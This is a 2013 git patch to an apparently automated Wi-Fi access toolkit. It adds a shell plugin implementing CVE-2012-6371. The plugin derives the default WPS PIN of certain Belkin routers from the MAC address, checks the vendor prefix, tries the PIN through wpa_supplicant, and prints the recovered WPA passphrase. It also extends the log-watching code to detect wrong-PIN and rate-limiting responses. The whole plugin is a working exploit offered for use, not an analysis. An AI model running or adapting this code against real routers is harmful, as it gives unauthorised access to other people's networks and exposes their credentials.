From 5995257992d9b4d86313e3d78a85b68ffff0a2af Mon Sep 17 00:00:00 2001
From: makefu <github@syntax-fehler.de>
Date: Sun, 26 May 2013 14:06:53 +0200
Subject: add belkin WPS plugin

---
 usr/lib/autowifi/lib/wps              | 16 ++++++++----
 usr/lib/autowifi/plugins/11belkin_wps | 48 +++++++++++++++++++++++++++++++++++
 2 files changed, 59 insertions(+), 5 deletions(-)
 create mode 100755 usr/lib/autowifi/plugins/11belkin_wps

diff --git a/usr/lib/autowifi/lib/wps b/usr/lib/autowifi/lib/wps
index 7fd38a26..8afd5b05 100644
--- a/usr/lib/autowifi/lib/wps
+++ b/usr/lib/autowifi/lib/wps
@@ -35,17 +35,23 @@ EOF
 	    #*"WPA: Key negotiation completed"*)
             # association failed
             #    exit 1 ;;
+
     if ( tail -f $WPA_LOG & echo "TAILPID: $!" )| while read line ; do
+        bye(){
+            kill -HUP $TAILPID
+            exit $1
+        }
+        echo $line
         case "$line" in
-	    TAILPID:*)IFS=" " set -- $line; TAILPID=$2;;
+            TAILPID:*)IFS=" " set -- $line; TAILPID=$2;;
+            *"WPS-FAIL msg=10 config_error=18"*) bye 1 ;; # wrong pin
+            *"CTRL-EVENT-EAP-FAILURE EAP authentication failed"*) bye 1;; # rate limiting
             *CTRL-EVENT-DISCONNECTED*):;;
-            *CTRL-EVENT-CONNECTED*)
-		kill -HUP $TAILPID
-                exit 0;;
+            *CTRL-EVENT-CONNECTED*) bye 0;; #yay connected
 
         esac
     done ; then
-	echo "Connected!"
+	#echo "Connected!"
 	sed -n 's/[ \t]*psk="\(.*\)"$/\1/p' $WPA_CONF
 	return 0
     else
diff --git a/usr/lib/autowifi/plugins/11belkin_wps b/usr/lib/autowifi/plugins/11belkin_wps
new file mode 100755
index 00000000..93dd447a
--- /dev/null
+++ b/usr/lib/autowifi/plugins/11belkin_wps
@@ -0,0 +1,48 @@
+#!/bin/sh
+# thanks to http://ednolo.alumnos.upv.es/?p=1295G
+# for the PoC code 
+# Calculates the default WPS pin of Belkin Routers and returns the WPA key
+#
+# Implementation of CVE-2012-6371
+
+# works :
+# Belkin_N+_XXXXXX   00:22:75:XX:XX:XX    F5D8235-4 v1000
+# belkin.XXX         00:1C:DF:XX:XX:XX    F5D8231-4 v5000
+# belkin.XXX         09:86:3B:XX:XX:XX    F9K1104   v1000
+
+cd $(dirname $(readlink -f $0))
+. ../lib/core
+. ../lib/wps
+parse_args $@
+
+MAC=$(printf "%s" $2| sed 's/://g')
+if [ ${#MAC} -ne 12 ] ;then
+    echo "MAC malformed"
+    exit 1
+fi
+VENDOR_MAC=${MAC:0:6}
+PRIVATE_MAC=${MAC:6:12}
+if ! [ $VENDOR_MAC == "002275" -o $VENDOR_MAC == "001CDF" -o $VENDOR_MAC == "09863B" ] ;then
+    echo "VENDOR MAC $VENDOR_MAC not affected"
+    exit 1
+fi
+
+calc_belkin(){
+    PRIVATE_MAC=${1}
+
+    p=$((0x$PRIVATE_MAC % 10000000))
+    wps_pin_checksum(){
+        pin=$1
+        accum=0
+        while [ $pin -ne 0 ];do
+            accum=$((accum + (3 * (pin % 10)) ))
+            pin=$((pin/10))
+            accum=$((accum + pin %10 ))
+            pin=$((pin/10))
+        done
+        echo $(( (10 - accum % 10) % 10))
+    }
+    printf "%07d%d" $p $(wps_pin_checksum $p)
+    return 0
+}
+try_wps_pin $@ $(calc_belkin ${PRIVATE_MAC})
-- 
cgit v1.2.3